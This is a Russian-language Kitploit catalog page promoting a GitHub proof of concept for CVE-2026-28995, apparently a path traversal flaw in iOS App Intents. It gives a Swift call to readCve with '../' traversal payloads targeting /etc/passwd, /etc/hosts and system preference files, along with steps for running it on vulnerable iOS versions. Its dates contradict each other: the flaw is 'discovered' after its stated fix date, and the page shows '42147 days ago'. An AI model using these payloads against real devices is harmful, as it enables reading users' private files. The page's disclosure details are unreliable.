Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-28995 — # CVE-2026-28995 PoC для CVE-2026-28995 — уязвимость Path Traversal в App Intents на iOS 26.4.2 и ниже. | Kitploit
Инструменты/GitHubGitHub/robertmak2014-sudow/cve-2026-28995
Безопасность iOSАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеМобильная безопасность
GitHubrobertmak2014-sudow/cve-2026-28995

CVE-2026-28995

# CVE-2026-28995 PoC для CVE-2026-28995 — уязвимость Path Traversal в App Intents на iOS 26.4.2 и ниже.

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
42147 дней назадЕщё не проверено
Поделиться

CVE-2026-28995

Доказательство концепции для CVE-2026-28995 — уязвимость Path Traversal в App Intents на iOS 26.4.2 и ниже.

Описание

Эта уязвимость позволяет вредоносному приложению читать любой файл за пределами своей песочницы через App Intents. Основная причина — недостаточная проверка путей в фреймворке App Intents от Apple.

Затронутые версии: iOS 26.4.2 и ниже
Исправлено в: iOS 26.5 (11 мая 2026)

Использование

1. Функция readCve(path: String) -> String

let intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
  1. Примеры путей

Путь Читает ../../../../../../../../../../../../../etc/passwd Пароли пользователей ../../../../../../../../../../../../../etc/hosts Файл hosts ../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist Системные настройки 3. Обработка каталогов

Если путь указывает на каталог, функция возвращает:

[DIRECTORY] Contents: file1.txt file2.jpg folder/ Как запустить

Создайте проект iOS в Xcode. Добавьте CVE-2026-28995.swift в проект. Вызовите readCve(path:) с целевым путем. Запустите на iOS 26.4.2 или более ранней версии. Ответственное раскрытие

Обнаружено: 1 июля 2026 г. Исправлено в: iOS 26.5 (11 мая 2026)

Скачать инструмент